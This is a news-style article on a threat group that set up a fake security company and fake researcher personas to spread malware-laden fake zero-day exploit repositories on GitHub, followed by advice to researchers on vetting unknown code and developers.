How Sophisticated Cybercriminals Are Exploiting Synthetic Security Researchers for IP Theft

Malicious GitHub Repository Targets Security Researchers

An Unprecedented Level of Sophistication

A threat group in May created a malicious GitHub repository, claiming to contain a zero-day exploit for a vulnerability in the Signal messaging app. What makes this attack unique is the extent to which the attackers went to establish a credible presence. They created a fake security company, High Sierra Cyber Security, and fabricated profiles of security researchers associated with it. Threat intelligence firm VulnCheck has conducted research on this incident and found that the effort put into building personas and credibility for the fake security company is unparalleled.

According to William Vu, a security researcher at VulnCheck, the attackers devoted a significant amount of time and effort to create this elaborate façade. They not only advertised the GitHub repositories containing the malware, but also created multiple fake personas for each actor involved. This level of sophistication in building a fake security company is a new development in the world of cyber attacks.

A History of Targeting Security Researchers

While targeting security researchers may be relatively rare, it is not a new phenomenon. In 2021, Google’s Threat Analysis Group (TAG) warned of North Korea-backed hackers who created a faux research blog and multiple fake Twitter profiles to deceive researchers. Similarly, Mandiant researchers released findings that North Korea also targeted security researchers using LinkedIn accounts and posing as recruiters.

These attacks on security researchers use social engineering techniques to exploit the supply chain. By creating a trustworthy image and faking their credibility, threat actors can deceive researchers into downloading and inspecting their malicious packages less thoroughly. This puts not only the researchers’ own systems at risk but also potentially exposes valuable intellectual property.

Vulnerabilities Explored via GitHub, WhatsApp, and More

The recent attack targeted security researchers by hosting fake exploits on GitHub. Once VulnCheck notified GitHub and had the pages taken down, the attackers would create new pages hosting exploits for other popular platforms, such as WhatsApp, Microsoft Exchange, and Discord. Each time a page was taken down, a new one would appear, continuing the cat-and-mouse game.

The researchers discovered that instead of containing an exploit, the Python files in the repositories would download an operating-system-specific binary if executed. While most antivirus programs detected the Windows malware loaded by the Python script, only a small number of Linux host-based scanners were able to detect the binary. This highlights the importance of using robust security measures and thoroughly vetting packages before downloading them.

The Implication for Research Community and Recommendations

This attack aimed to gain access to security researchers’ cache of zero-day exploits and corporate intellectual property. Given the potentially devastating consequences of such breaches, it is crucial for both companies and individual researchers to be vigilant and take appropriate measures to ensure their online safety.

Erich Kron, a security awareness advocate, emphasized that running code written by others, especially from open websites like GitHub, always carries a certain level of risk. Researchers should be cautious when examining code and should not assume that any malicious parts are legitimate components of disclosed zero-day exploits.

Researchers can protect themselves by conducting due diligence before engaging with unknown developers or companies. It is important to examine the track record and history of the company claiming to conduct security research, as well as the credentials of the associated researchers. Unusual or suspicious activity, such as a sudden appearance of a package or developers with no prior history in the field, should be treated as red flags.

Conclusion

The attack on security researchers using a malicious GitHub repository coupled with the creation of a fake security company demonstrates the increasing sophistication of cyber criminals. It highlights the need for increased awareness and caution among the research community and the importance of robust security measures in the supply chain process. By staying vigilant, conducting thorough vetting processes, and adhering to best security practices, researchers can protect themselves and their valuable intellectual property.